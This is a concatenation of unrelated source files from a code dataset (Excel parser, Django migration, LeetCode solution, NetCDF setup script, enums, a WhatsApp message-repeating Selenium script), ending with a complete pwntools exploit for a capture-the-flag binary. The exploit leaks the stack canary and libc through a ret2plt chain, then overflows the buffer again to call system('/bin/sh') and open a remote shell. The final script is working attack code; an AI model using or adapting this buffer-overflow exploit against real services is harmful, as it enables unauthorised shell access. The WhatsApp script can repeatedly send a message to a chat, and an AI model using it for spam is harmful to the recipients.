    # Use a set (was a list): membership tests in the mex loop become O(1).
    reachable = set()
    for h in range(2, H - 1):
        reachable.add(grundy(h, W) ^ grundy(H - h, W))
    for w in range(2, W - 1):
        reachable.add(grundy(H, w) ^ grundy(H, W - w))
    mex = 0  # minimum excludant: smallest non-negative int not reachable
    while mex in reachable:
        mex += 1
    mem[key] = mex
    return mex
def main():
    # Interactive entry point: read the board size, then report the winner.
    # The first player ("Alice") wins iff the grundy number is non-zero.
    H = input_int("h = ")
    W = input_int("w = ")
    print("Alice wins" if grundy(H, W) else "Bob wins")
if __name__ == "__main__":
main()
| [
"kojirou.tensou@gmail.com"
] | kojirou.tensou@gmail.com |
e10e9064f3dc573fd39344ceefbdf8c3bcd548cf | b2b1e16968474ed573ebbebc1ee84bca59adbae1 | /ExcelParser/CountRows.py | f2759fce4c40fa1930aaef464718571aec7d2c72 | [] | no_license | shahpriyesh/PracticeCode | a03979d92a092bdbb5d0c7cfc1cfebc3f82e1c91 | 2afc3d0b3cd58d80ceb825a3ff0d190893e729fa | refs/heads/master | 2022-11-29T12:37:01.719792 | 2020-07-27T18:02:51 | 2020-07-27T18:02:51 | 257,656,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,139 | py | import xlrd
from openpyxl import *
def countEqualEntries(excel_file, sheet_name):
    """Tally spreadsheet rows by their first-column key.

    Returns {key: [count, question_text, difficulty, [company, ...]]}.
    Assumes the layout: col 0 = key, col 1 = question text, a difficulty
    string ('Easy'/'Medium'/'Hard') somewhere in the row, and col -2 =
    company name when it is a string -- TODO confirm against the sheet.
    """
    wb = xlrd.open_workbook(excel_file)
    sheet = wb.sheet_by_name(sheet_name)
    counter = {}
    for i in range(1, sheet.nrows):  # row 0 is presumably a header; skipped
        row = sheet.row_values(i)
        if row[0] in counter:
            counter[row[0]][0] += 1
            if isinstance(row[-2], str):
                counter[row[0]][3].append(row[-2])
        else:
            # List contains (Count, Question string, difficulty level, list of company names)
            if 'Easy' in row:
                counter[row[0]] = [1, row[1], 'Easy', []]
            elif 'Medium' in row:
                counter[row[0]] = [1, row[1], 'Medium', []]
            else:
                # Fallback: rows without Easy/Medium are treated as Hard.
                counter[row[0]] = [1, row[1], 'Hard', []]
            if isinstance(row[-2], str):
                counter[row[0]][3].append(row[-2])
    wb.release_resources()  # free xlrd's mmap/handles before dropping the ref
    del wb
    return counter
def writeTotalEntries(excel_file, sheet_name, counter):
    """Write counts/difficulty/companies (cols 9-11) for each key's first row.

    `counter` is the mapping produced by countEqualEntries(); only the first
    occurrence of each key gets the summary columns filled in.
    """
    wb = load_workbook(excel_file)
    sheet = wb[sheet_name]
    unique = set()
    for i in range(1, sheet.max_row):  # NOTE(review): max_row is inclusive
        # in openpyxl, so the last row is skipped here -- confirm intended.
        c1 = sheet.cell(row=i, column=1)
        c9 = sheet.cell(row=i, column=9)
        c10 = sheet.cell(row=i, column=10)
        c11 = sheet.cell(row=i, column=11)
        # writing values to cells
        if c1.value and c1.value not in unique:
            mapping = counter[c1.value]
            c9.value = mapping[0]
            c10.value = mapping[2]
            c11.value = ', '.join(mapping[3])
            unique.add(c1.value)
    wb.save(excel_file)
    wb.close()
def reformatEntries(excel_file, sheet_name):
    """Remove rows whose first-column value duplicates an earlier row.

    FIX: the previous version called sheet.delete_rows(i, 1) while walking
    row indices forward, which shifts every later row up and skips the row
    that moves into position i; it also iterated range(1, max_row) and so
    never examined the last row (openpyxl's max_row is inclusive).  Now we
    collect duplicate row indices in a first pass, then delete bottom-up so
    earlier indices stay valid.  The first occurrence of each key is kept,
    matching the original intent.
    """
    wb = load_workbook(excel_file)
    sheet = wb[sheet_name]
    seen = set()
    duplicate_rows = []
    for i in range(1, sheet.max_row + 1):
        value = sheet.cell(row=i, column=1).value
        if value in seen:
            duplicate_rows.append(i)
        seen.add(value)
    # Delete from the bottom up so pending indices are not shifted.
    for i in reversed(duplicate_rows):
        sheet.delete_rows(i, 1)
    wb.save(excel_file)
    wb.close()
filename = "/Users/pshah/Downloads/Leetcode_FAQ.xlsx"
sheetname = "FAQs"
counter = countEqualEntries(filename, sheetname)
writeTotalEntries(filename, sheetname, counter)
# reformatEntries(filename, sheetname) | [
"priyesh.shah@hitachivantara.com"
] | priyesh.shah@hitachivantara.com |
bbc0777dcd645f87565fccb02a0a3c22c08f6d20 | ae9fc81dd2a93a614c8e579b570ac3f4d2962392 | /Application/ReclamaCaicoProject/ReclamaCaicoApp/migrations/0001_initial.py | b020c4f1719f8084cc01a6631931c51963a8fdd4 | [
"MIT"
] | permissive | WesleyVitor/ReclamaCaico | c3743d40771a808c8238a93513ef54829413d314 | df67997821fc00236f1d9c77e8685ed8e4a6934b | refs/heads/master | 2022-12-10T21:43:23.615702 | 2020-09-17T17:18:34 | 2020-09-17T17:18:34 | 260,520,207 | 0 | 0 | MIT | 2020-09-17T17:18:35 | 2020-05-01T17:38:45 | Python | UTF-8 | Python | false | false | 1,912 | py | # Generated by Django 2.2.2 on 2019-09-02 11:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: Login, Reclamacao (complaint) and Comentario models.

    Auto-generated by Django 2.2 `makemigrations`; edit with care, as the
    operations must match the recorded migration state.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Login',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(max_length=200)),
                ('password', models.CharField(max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Reclamacao',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('titulo', models.CharField(default='w', max_length=20)),
                ('nome', models.CharField(max_length=200)),
                ('bairro', models.CharField(max_length=200)),
                ('rua', models.CharField(max_length=200)),
                ('Ncasa', models.IntegerField()),
                ('foto', models.ImageField(default='w', upload_to='Reclama')),
                ('descricao', models.TextField(default='w', max_length=300)),
                # Nullable author link to the configured user model.
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Comentario',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text1', models.TextField(max_length=1000)),
                # Comment belongs to a Reclamacao; cascades on delete.
                ('idd', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ReclamaCaicoApp.Reclamacao')),
            ],
        ),
    ]
| [
"wesleydemorais@outlook.com.br"
] | wesleydemorais@outlook.com.br |
f3eaff00fba343a8a4a7f1ceb74a608f98fca37c | 99ba551645dc9beed36f0478b396977c50c3e7ef | /leetcode-vscode/438.找到字符串中所有字母异位词.py | da5c5fdcfc35c7bed066617bb31112a2426144bb | [] | no_license | wulinlw/leetcode_cn | 57381b35d128fb3dad027208935d3de3391abfd0 | b0f498ebe84e46b7e17e94759dd462891dcc8f85 | refs/heads/master | 2021-08-09T17:26:45.688513 | 2021-07-15T14:38:30 | 2021-07-15T14:38:30 | 134,419,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,625 | py | #
# @lc app=leetcode.cn id=438 lang=python3
#
# [438] 找到字符串中所有字母异位词
#
# https://leetcode-cn.com/problems/find-all-anagrams-in-a-string/description/
#
# algorithms
# Medium (41.20%)
# Likes: 247
# Dislikes: 0
# Total Accepted: 21.8K
# Total Submissions: 51.4K
# Testcase Example: '"cbaebabacd"\n"abc"'
#
# 给定一个字符串 s 和一个非空字符串 p,找到 s 中所有是 p 的字母异位词的子串,返回这些子串的起始索引。
#
# 字符串只包含小写英文字母,并且字符串 s 和 p 的长度都不超过 20100。
#
# 说明:
#
#
# 字母异位词指字母相同,但排列不同的字符串。
# 不考虑答案输出的顺序。
#
#
# 示例 1:
#
#
# 输入:
# s: "cbaebabacd" p: "abc"
#
# 输出:
# [0, 6]
#
# 解释:
# 起始索引等于 0 的子串是 "cba", 它是 "abc" 的字母异位词。
# 起始索引等于 6 的子串是 "bac", 它是 "abc" 的字母异位词。
#
#
# 示例 2:
#
#
# 输入:
# s: "abab" p: "ab"
#
# 输出:
# [0, 1, 2]
#
# 解释:
# 起始索引等于 0 的子串是 "ab", 它是 "ab" 的字母异位词。
# 起始索引等于 1 的子串是 "ba", 它是 "ab" 的字母异位词。
# 起始索引等于 2 的子串是 "ab", 它是 "ab" 的字母异位词。
#
#
#
from typing import List
# @lc code=start
class Solution:
    def findAnagrams(self, s: str, p: str) -> List[int]:
        """Return start indices of every anagram of `p` inside `s`.

        Sliding window of character counts: grow the window one character
        at a time, shrink from the left once it exceeds len(p), and record
        the left edge whenever the window's counts match p's counts.
        """
        target = {}
        for ch in p:
            target[ch] = target.get(ch, 0) + 1
        counts = {}
        starts = []
        lo = 0
        for hi, ch in enumerate(s):
            counts[ch] = counts.get(ch, 0) + 1
            if hi == lo + len(p):
                # Window is one char too wide: drop the leftmost char,
                # deleting the key when its count hits zero so dict
                # equality with `target` works.
                dropped = s[lo]
                if counts[dropped] == 1:
                    del counts[dropped]
                else:
                    counts[dropped] -= 1
                lo += 1
            if counts == target:
                starts.append(lo)
        return starts
# @lc code=end
s = "cbaebabacd"
p = "abc"
# s = "abab"
# p = "ab"
# s = "baa"
# p = "aa"
o = Solution()
print(o.findAnagrams(s, p)) | [
"wulinlw@gmail.com"
] | wulinlw@gmail.com |
8cda640d958088ed52e602287e97730545bd2a62 | a99a44aee5cfc5e080f6d83d2bcc1c3d273a3426 | /scripts/iemre/init_hourly.py | 4876319dfe3c2b9cd95b3aa45e88caad6deaf8c6 | [
"MIT"
] | permissive | ragesah/iem | 1513929c8bc7f254048271d61b4c4cf27a5731d7 | 8ed970d426bddeaa3e7ded593665d22f0f9f6e87 | refs/heads/main | 2023-08-20T20:01:15.480833 | 2021-10-12T15:44:52 | 2021-10-12T15:44:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,467 | py | """Generate the IEMRE hourly analysis file for a year"""
import datetime
import sys
import os
import geopandas as gpd
import numpy as np
from pyiem import iemre
from pyiem.grid.zs import CachingZonalStats
from pyiem.util import get_dbconn, ncopen, logger
LOG = logger()
def init_year(ts):
    """
    Create a new NetCDF file for a year of our specification!

    Defines the 0.125 degree lat/lon grid, an hourly time axis for the
    year of `ts`, and the tracked variables (sky coverage, temperature,
    dew point, winds, precipitation).  Refuses to overwrite an existing
    file.
    """
    fn = iemre.get_hourly_ncname(ts.year)
    if os.path.isfile(fn):
        LOG.info("Cowardly refusing to overwrite: %s", fn)
        return
    nc = ncopen(fn, "w")
    nc.title = "IEM Hourly Reanalysis %s" % (ts.year,)
    nc.platform = "Grided Observations"
    nc.description = "IEM hourly analysis on a 0.125 degree grid"
    nc.institution = "Iowa State University, Ames, IA, USA"
    nc.source = "Iowa Environmental Mesonet"
    nc.project_id = "IEM"
    nc.realization = 1
    nc.Conventions = "CF-1.0"
    nc.contact = "Daryl Herzmann, akrherz@iastate.edu, 515-294-5978"
    nc.history = ("%s Generated") % (
        datetime.datetime.now().strftime("%d %B %Y"),
    )
    nc.comment = "No Comment at this time"
    # Setup Dimensions
    nc.createDimension("lat", iemre.NY)
    nc.createDimension("lon", iemre.NX)
    ts2 = datetime.datetime(ts.year + 1, 1, 1)
    days = (ts2 - ts).days
    LOG.info("Year %s has %s days", ts.year, days)
    nc.createDimension("time", int(days) * 24)
    # Setup Coordinate Variables
    lat = nc.createVariable("lat", float, ("lat",))
    lat.units = "degrees_north"
    lat.long_name = "Latitude"
    lat.standard_name = "latitude"
    lat.axis = "Y"
    lat[:] = iemre.YAXIS
    lon = nc.createVariable("lon", float, ("lon",))
    lon.units = "degrees_east"
    lon.long_name = "Longitude"
    lon.standard_name = "longitude"
    lon.axis = "X"
    lon[:] = iemre.XAXIS
    tm = nc.createVariable("time", float, ("time",))
    tm.units = "Hours since %s-01-01 00:00:0.0" % (ts.year,)
    tm.long_name = "Time"
    tm.standard_name = "time"
    tm.axis = "T"
    tm.calendar = "gregorian"
    tm[:] = np.arange(0, int(days) * 24)
    # Tracked variables
    hasdata = nc.createVariable("hasdata", np.int8, ("lat", "lon"))
    hasdata.units = "1"
    hasdata.long_name = "Analysis Available for Grid Cell"
    hasdata.coordinates = "lon lat"
    hasdata[:] = 0
    # can storage -128->127 actual values are 0 to 100
    skyc = nc.createVariable(
        "skyc", np.int8, ("time", "lat", "lon"), fill_value=-128
    )
    skyc.long_name = "ASOS Sky Coverage"
    # FIX: attribute was misspelled `stanard_name`, writing a bogus NetCDF
    # attribute instead of the CF-style standard_name.
    skyc.standard_name = "ASOS Sky Coverage"
    skyc.units = "%"
    skyc.valid_range = [0, 100]
    skyc.coordinates = "lon lat"
    # 0->65535
    tmpk = nc.createVariable(
        "tmpk", np.uint16, ("time", "lat", "lon"), fill_value=65535
    )
    tmpk.units = "K"
    tmpk.scale_factor = 0.01
    tmpk.long_name = "2m Air Temperature"
    tmpk.standard_name = "2m Air Temperature"
    tmpk.coordinates = "lon lat"
    # 0->65535 0 to 655.35
    # FIX: fill_value was 65335 (typo); use 65535 like the other uint16
    # variables so the sentinel sits at the top of the valid range.
    dwpk = nc.createVariable(
        "dwpk", np.uint16, ("time", "lat", "lon"), fill_value=65535
    )
    dwpk.units = "K"
    dwpk.scale_factor = 0.01
    dwpk.long_name = "2m Air Dew Point Temperature"
    dwpk.standard_name = "2m Air Dew Point Temperature"
    dwpk.coordinates = "lon lat"
    # NOTE: we need to store negative numbers here, gasp
    # -32768 to 32767 so -65.5 to 65.5 mps
    uwnd = nc.createVariable(
        "uwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
    )
    uwnd.scale_factor = 0.002
    uwnd.units = "meters per second"
    uwnd.long_name = "U component of the wind"
    uwnd.standard_name = "U component of the wind"
    uwnd.coordinates = "lon lat"
    # NOTE: we need to store negative numbers here, gasp
    # -32768 to 32767 so -65.5 to 65.5 mps
    vwnd = nc.createVariable(
        "vwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
    )
    vwnd.scale_factor = 0.002
    vwnd.units = "meters per second"
    vwnd.long_name = "V component of the wind"
    vwnd.standard_name = "V component of the wind"
    vwnd.coordinates = "lon lat"
    # 0->65535 0 to 655.35
    p01m = nc.createVariable(
        "p01m", np.uint16, ("time", "lat", "lon"), fill_value=65535
    )
    p01m.units = "mm"
    p01m.scale_factor = 0.01
    p01m.long_name = "Precipitation"
    p01m.standard_name = "Precipitation"
    p01m.coordinates = "lon lat"
    p01m.description = "Precipitation accumulation for the hour valid time"
    nc.close()
def compute_hasdata(year):
    """Flag grid cells covered by any US state in the year's `hasdata` var.

    Rasterizes state polygons (fetched from the postgis database) onto the
    IEMRE grid via cached zonal stats; any cell touched by a state polygon
    gets hasdata=1.
    """
    nc = ncopen(iemre.get_hourly_ncname(year), "a", timeout=300)
    czs = CachingZonalStats(iemre.AFFINE)
    pgconn = get_dbconn("postgis")
    states = gpd.GeoDataFrame.from_postgis(
        "SELECT the_geom, state_abbr from states",
        pgconn,
        index_col="state_abbr",
        geom_col="the_geom",
    )
    # Flip rows so the array matches the affine transform's north-up order.
    data = np.flipud(nc.variables["hasdata"][:, :])
    czs.gen_stats(data, states["the_geom"])
    for nav in czs.gridnav:
        if nav is None:
            continue
        grid = np.ones((nav.ysz, nav.xsz))
        grid[nav.mask] = 0.0  # masked cells lie outside the polygon
        jslice = slice(nav.y0, nav.y0 + nav.ysz)
        islice = slice(nav.x0, nav.x0 + nav.xsz)
        data[jslice, islice] = np.where(grid > 0, 1, data[jslice, islice])
    # Flip back before writing to the NetCDF layout.
    nc.variables["hasdata"][:, :] = np.flipud(data)
    nc.close()
def main(argv):
    """Entry point: argv[1] is the year whose hourly file to create."""
    year = int(argv[1])
    init_year(datetime.datetime(year, 1, 1))
    compute_hasdata(year)
compute_hasdata(year)
if __name__ == "__main__":
main(sys.argv)
| [
"akrherz@iastate.edu"
] | akrherz@iastate.edu |
805e26a503b1e54e65411035aebfd19197d9f38b | 9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56 | /google/ads/googleads/v9/enums/types/ad_group_criterion_approval_status.py | 76072e9401b3ddc6e578d95c993b65b3da5a7ca1 | [
"Apache-2.0"
] | permissive | GerhardusM/google-ads-python | 73b275a06e5401e6b951a6cd99af98c247e34aa3 | 676ac5fcb5bec0d9b5897f4c950049dac5647555 | refs/heads/master | 2022-07-06T19:05:50.932553 | 2022-06-17T20:41:17 | 2022-06-17T20:41:17 | 207,535,443 | 0 | 0 | Apache-2.0 | 2019-09-10T10:58:55 | 2019-09-10T10:58:55 | null | UTF-8 | Python | false | false | 1,262 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v9.enums",
marshal="google.ads.googleads.v9",
manifest={"AdGroupCriterionApprovalStatusEnum",},
)
class AdGroupCriterionApprovalStatusEnum(proto.Message):
    r"""Container for enum describing possible AdGroupCriterion
    approval statuses.
    """

    class AdGroupCriterionApprovalStatus(proto.Enum):
        r"""Enumerates AdGroupCriterion approval statuses."""
        # NOTE: generated from the Google Ads API protos; values must stay
        # in sync with the proto definition -- do not renumber.
        UNSPECIFIED = 0
        UNKNOWN = 1
        APPROVED = 2
        DISAPPROVED = 3
        PENDING_REVIEW = 4
        UNDER_REVIEW = 5
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | GerhardusM.noreply@github.com |
baab7d0a2eeef70ff34b1be7b72ce3daea803683 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/word-count/fe23ec94d69343a3a5a10f713adfd463.py | d52d5cd350e7bed379f1fefa4f8f22ad9bfdec49 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 251 | py | # -*-coding: utf-8-*-
#! /usr/bin/env python3
def word_count(string):
    """Return a dict mapping each whitespace-separated word to its count.

    Cleanups: use dict.get() instead of an if/else membership branch, and
    stop rebinding the `string` parameter to its split list.
    """
    counts = {}
    for word in string.split():
        counts[word] = counts.get(word, 0) + 1
    return counts
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
4a90b353d28203a2b13dd7f10e419572b1551633 | 784eca4391204e2352f320d632e29d37ea136f32 | /PracticeCodes/whatsApp.py | b766433acc83e68763c1dd13d356cee6d98734c7 | [] | no_license | JT4life/PythonCodes | e9d7156cff7b58ad6e1fd253cd645e707be6a5d5 | 148229c14b21dc2a34b7f1446b148b1040a84dad | refs/heads/master | 2022-11-07T03:58:07.850557 | 2020-06-15T22:13:10 | 2020-06-15T22:13:10 | 272,554,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from selenium import webdriver
# Sends the same WhatsApp Web message `count` times to one chat via Selenium.
#Download Chrome driver and paste in script folder in python !
driver = webdriver.Chrome()
driver.get('https://web.whatsapp.com/')
name = input('Enter the name of user or group : ')
msg = input('Enter your message : ')
count = int(input('Enter the count : '))
# Pause until the user has scanned the WhatsApp Web QR code in the browser.
input('Enter anything after scanning QR code')
# Locate the chat by its title attribute and open it.
user = driver.find_element_by_xpath('//span[@title = "{}"]'.format(name))
user.click()
# NOTE(review): '_13mgZ' / '_3M-N-' are WhatsApp Web CSS class names for the
# message box and send button -- they change frequently; verify before use.
msg_box = driver.find_element_by_class_name('_13mgZ')
for i in range(count):
    msg_box.send_keys(msg)
    button = driver.find_element_by_class_name('_3M-N-')
    button.click()
| [
"joshua_4_life@hotmail.com"
] | joshua_4_life@hotmail.com |
0cf32f19f7a7f9aa59508484ced33b621773e946 | 074421d31af92ae29c7c78bdb7e50f199a38eb9b | /weixin/code/rfid_oss/event_manager/command_code.py | 4db7933b49755753bde7e285fbe6ec665b1b3e52 | [] | no_license | allenforrest/wxbiz | 3f49ce66b37e281fc375f548610aa54a0f73268f | e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f | refs/heads/master | 2016-09-06T15:17:49.420934 | 2013-08-05T13:13:40 | 2013-08-05T13:13:40 | null | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 2,184 | py | #coding=gbk
"""
Copyright (C), 2012-2015, Anything Connected Possibilities
Author: ACP2013
Version: 1.0
Date: 2012-11-22
Description: event manager命令码定义文件
Others:
Key Class&Method List:
1. ....
History:
1. Date:2012-11-22
Author:ACP2013
Modification:新建文件
"""
#OSS 命令码
OSS_BASE = 0x02000000
#一个APP分配0x1000个命令码
EVENT_REPORT_BASE = 0x0
########################################################################
#EVENT MANAGER COMMAND CODE
########################################################################
"""
EVENT_REPORT_COMMAND
data区有1个参数
event_data:上报event数据,pickle编码
没有返回信息
"""
EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 0
"""
EVENT_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 1
"""
EVENT_EXPORT_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 2
"""
EVENT_EXPORT_TASK_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_TASK_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 3
"""
EVENT_FILTER_LIST_REQUEST
data区没有参数
返回 EventFilterListResponse 的JSON编码
"""
EVENT_FILTER_LIST_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 4
"""
EVENT_IMC_QUERY_EAU_REQUEST
data区有1个参数
query_req:EventImcQueryEauRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_IMC_QUERY_EAU_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 5
"""
EVENT_QUERY_TO_IMC_REQUEST,消息格式同 EVENT_QUERY_REQUEST,用于IMC向EAU查询
"""
EVENT_QUERY_TO_IMC_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 6
"""
WEB_EVENT_REPORT_COMMAND,用于WEB相关模块向event manager发送事件
"""
WEB_EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 7
if __name__=='__main__':
print EVENT_QUERY_REQUEST, EVENT_EXPORT_REQUEST, EVENT_EXPORT_TASK_QUERY_REQUEST, EVENT_IMC_QUERY_EAU_REQUEST, WEB_EVENT_REPORT_COMMAND
| [
"allenxu@gmail.com"
] | allenxu@gmail.com |
ec593b0300c2aa722f382c36dbd9335956e4a56d | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/processor/mimetype/enumerations.py | 8547e4fb1a4820fa3604c5a82da52f2bd920b44c | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | # -*- coding: utf-8 -*-
"""
mimetype enumerations module.
"""
from pyrin.core.enumerations import CoreEnum
class MIMETypeEnum(CoreEnum):
    """
    mimetype enum.

    Common MIME type strings used when setting or checking content types.
    """

    TEXT = 'text/plain'
    HTML = 'text/html'
    JAVASCRIPT = 'text/javascript'
    OCTET_STREAM = 'application/octet-stream'
    JSON = 'application/json'
| [
"mohamadnobakht@gmail.com"
] | mohamadnobakht@gmail.com |
6b5c8c1161631de22919ca67fea10198953e24c0 | 60f1981f8fb7717a92921c0b7404f6eac06b100b | /Pwn/flag/random_rope.py | 680882cfec123c4fd91d1ae75f50f36746659b1c | [] | no_license | MidnightFlag/CTF2021 | 765d73d227c23cea1df2bbf61a95b2c915be41ee | 5b477472b1491ec7351f75b68f3d8883760e4280 | refs/heads/main | 2023-04-08T13:57:29.767417 | 2021-04-19T18:13:29 | 2021-04-19T18:13:29 | 310,705,849 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,680 | py | #!/usr/bin/env python3
from pwn import *
proc = remote("172.17.0.6", 8888)
libc = ELF("./libc-2.28.so")
#proc = process("/home/kali/Documents/SB/MidnightCTF/PWN/pwn/infra/5_random_rope/random_rope")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
leak = proc.recvuntil(b":\n\n").decode()
log.info(leak)
log.info("Parsing the leak...")
leak = leak.split("\n")[1].split(":")[1].split(" ")
if int(leak[-5] )< 0:
canary = (1 << 32) + int(leak[-5])
else:
canary = int(leak[-5])
saved_ebp = (1 << 32) + int(leak[-2])
saved_eip = int(leak[-1])
pc_thunk = int(leak[-3])
pad = int(leak[-4])
log.info("Padding 1 : {}".format(hex(pad)))
log.info("Pc_thunk : {}".format(hex(pc_thunk)))
log.info("Canary : {}".format(hex(canary)))
log.info("Saved EBP : {}".format(hex(saved_ebp)))
log.info("Saved EIP : {}".format(hex(saved_eip)))
log.info("Crafting Payload...")
# Step 1 : Locate a print function (puts, puts...) so we can leak a libc function address by passing a GOT function's entry to it as a parameter.
plt_puts = 0x00001050 # Offset between the base addr and the PLT entry for "puts".
post_vuln_call = 0x00001290 # Offset between the base addr and the instruction that follows the call to "vuln", aka the saved_eip while we are in the "vuln" stackframe.
offset_plt_vuln = post_vuln_call - plt_puts # Offset between post_vuln_call and the PLT entry for the "puts" function.
real_plt_puts = saved_eip - offset_plt_vuln # PLT entry for the "puts" function at runtime.
log.info("PLT entry for 'puts' : {}".format(hex(real_plt_puts)))
# Step 2 : Locate the GOT entry for any function of the LIBC, so we can read the entry using "puts" and leak memory
got_puts = 0x00004014 # GOT entry for "scanf"
offset_got_vuln = got_puts - post_vuln_call # Offset between post_vuln_call and the GOT entry for "scanf"
real_got_puts = saved_eip + offset_got_vuln # GOT entry for the "scanf" function at runtime
log.info("GOT entry for 'puts' : {}".format(hex(real_got_puts)))
# Step 3 : Locate the "main" function address, so we can ret2main after leaking the libc and abuse the buffer overflow again.
main_addr = 0x00001259 # Offset between the base addr and the start of the main function
offset_main_vuln = post_vuln_call - main_addr # Offset between the post_vuln_call and the main
ret2main = saved_eip - offset_main_vuln # "main" function address at runtime
log.info("Main address : {}".format(hex(ret2main)))
# Step 4 : Locate a gadget "pop ebx;ret", so we can use it to control paramaters of the functions we want to call.
gadget = 0x0000101e
offset_pop_vuln = post_vuln_call - gadget
real_gadget = saved_eip - offset_pop_vuln
log.info("POP EBX;RET address : {}".format(hex(real_gadget)))
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + plt_puts + pop ebx;ret + got_scanf + ret2main")
# Step 5 : build the payload and leak libc
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP.
payload += p32(real_plt_puts) # Rewrite the saved EIP in order to call puts from the PLT stub.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter for puts.
payload += p32(real_got_puts) # Parameter for puts, which is the GOT entry for the scanf function, leaking the libc. (-1 so we are sure to get the whole thing, and to not crash the program)
payload += p32(ret2main) # Ret2main so we can abuse the buffer overflow again.
log.info("Sending payload...")
proc.sendline(payload)
answer = proc.recvuntil(b':\n\n')
log.info("{}".format(answer))
leak_scanf = u32(answer.split(b"\n\n\n")[2][:4])
log.info("'Scanf' function leak : {}".format(hex(leak_scanf)))
log.info("Locating 'system' function and exploiting the overflow again...")
# Step 6 : compute system() address and find a "/bin/sh" string, so we can jump on system() and get a shell
leak_system = leak_scanf - libc.symbols["puts"] + libc.symbols["system"]
leak_binsh = leak_scanf - libc.symbols["puts"] + next(libc.search(b"/bin/sh\x00"))
log.info("'System' function leak : {}".format(hex(leak_system)))
log.info("'/bin/sh\\x00' found at : {}".format(hex(leak_binsh)))
log.info("Crafting Payload...")
# Step 7 : build the final payload and get the shell
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP -> that's an old EBP, we could use the new saved_ebp value but that's not a need.
payload += p32(leak_system) # Rewrite the saved EIP in order to call the "system" function from the LIBC.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter.
payload += p32(leak_binsh) # Parameter for system "/bin/sh\x00"
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + system + pop ebx;ret + '/bin/sh'")
log.info("Sending payload...")
proc.sendline(payload)
# Step 8 : enjoy ;)
proc.interactive()
| [
"a@example.com"
